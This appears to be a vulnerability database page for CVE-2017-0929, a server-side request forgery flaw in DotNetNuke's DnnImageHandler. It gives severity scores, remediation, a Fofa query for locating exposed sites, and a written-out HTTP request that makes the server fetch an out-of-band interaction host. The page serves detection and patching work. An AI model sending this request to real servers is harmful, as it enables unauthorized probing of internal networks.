🔙 목록으로 돌아가기

CVE-2017-0929: DotNetNuke (DNN) ImageHandler <9.2.0 - Server-Side Request Forgery

TitleDotNetNuke (DNN) ImageHandler <9.2.0 - Server-Side Request Forgery
Authorcharanrayudu,meme-lord
SeverityHigh
ImpactAn attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks.
RemediationUpgrade DotNetNuke (DNN) ImageHandler to version 9.2.0 or above.
CVSS Score7.5
EPSS Score0.92808
CVE IDCVE-2017-0929
CWE IDCWE-918
Fofa Queryapp="dotnetnuke"
Tags cve2017 cve dnn dotnetnuke hackerone oast ssrf dnnsoftware vkev vuln

🔍 Vulnerability Description

DotNetNuke (aka DNN) before 9.2.0 suffers from a server-side request forgery vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources.

🌐 HTTP Request

GET /DnnImageHandler.ashx?mode=file&url=http://d5jq609le0o1cn7m5d4gyu4837w1nqm15.oast.site HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-0929.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-0929.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A